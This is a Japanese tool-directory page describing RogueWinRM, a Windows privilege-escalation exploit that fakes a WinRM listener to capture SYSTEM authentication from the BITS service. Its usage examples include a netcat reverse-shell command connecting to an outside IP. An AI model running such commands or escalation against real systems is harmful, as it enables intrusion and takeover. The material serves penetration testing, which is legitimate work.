Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
RogueWinRM — Windows ローカル特権昇格:サービスアカウントからシステムへ | Kitploit
ツール/GitHubGitHub/antoniococo/roguewinrm
特権昇格エクスプロイトペネトレーションテスト
GitHubantoniococo/roguewinrm

RogueWinRM

Windows ローカル特権昇格:サービスアカウントからシステムへ

リポジトリを見る
9641126年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

RogueWinRM

RogueWinRM は、WinRM サービスが実行されていない場合 (Windows 10ではデフォルトだが、Windows Server 2019ではNOT) に、サービスアカウント(SeImpersonatePrivilege を持つ)からローカルシステムアカウントへ昇格できるローカル権限昇格エクスプロイトです。

簡単に説明すると、本物の WinRM サービスを偽装してポート 5985 での受信接続を待ち受けます。
これは、そのポートに接続しようとする任意のサービスと NTLM 認証をネゴシエートしようとする最小限のウェブサーバーです。
その後、BITS サービス(ローカルシステムとして実行)がトリガーされ、不正リスナーへの認証を試みます。不正リスナーへの認証が成功すると、ローカルシステムユーザーを偽装し、その権限で任意のプロセスを起動できます。

この脆弱性の完全な技術的説明は以下のリンクにあります --> https://decoder.cloud/2019/12/06/we-thought-they-were-potatoes-but-they-were-beans/

使用法

root@kitploit:~
RogueWinRM

必須引数:
-p <プログラム>: 起動するプログラム

オプション引数:
-a <引数>: プログラムに渡すコマンドライン引数(デフォルト: NULL)
-l <ポート>: リスニングポート(デフォルト: 5985 WinRM)
-d : デバッグ出力を有効化

使用例

RogueWinRM

対話型 cmd の実行:

root@kitploit:~
RogueWinRM.exe -p C:\windows\system32\cmd.exe

netcat リバースシェルの実行:

root@kitploit:~
RogueWinRM.exe -p C:\windows\temp\nc64.exe -a "10.0.0.1 3001 -e cmd"

著者

  • Antonio Cocomazzi
  • Andrea Pierini
  • Roberto (0xea31)
ツールをダウンロード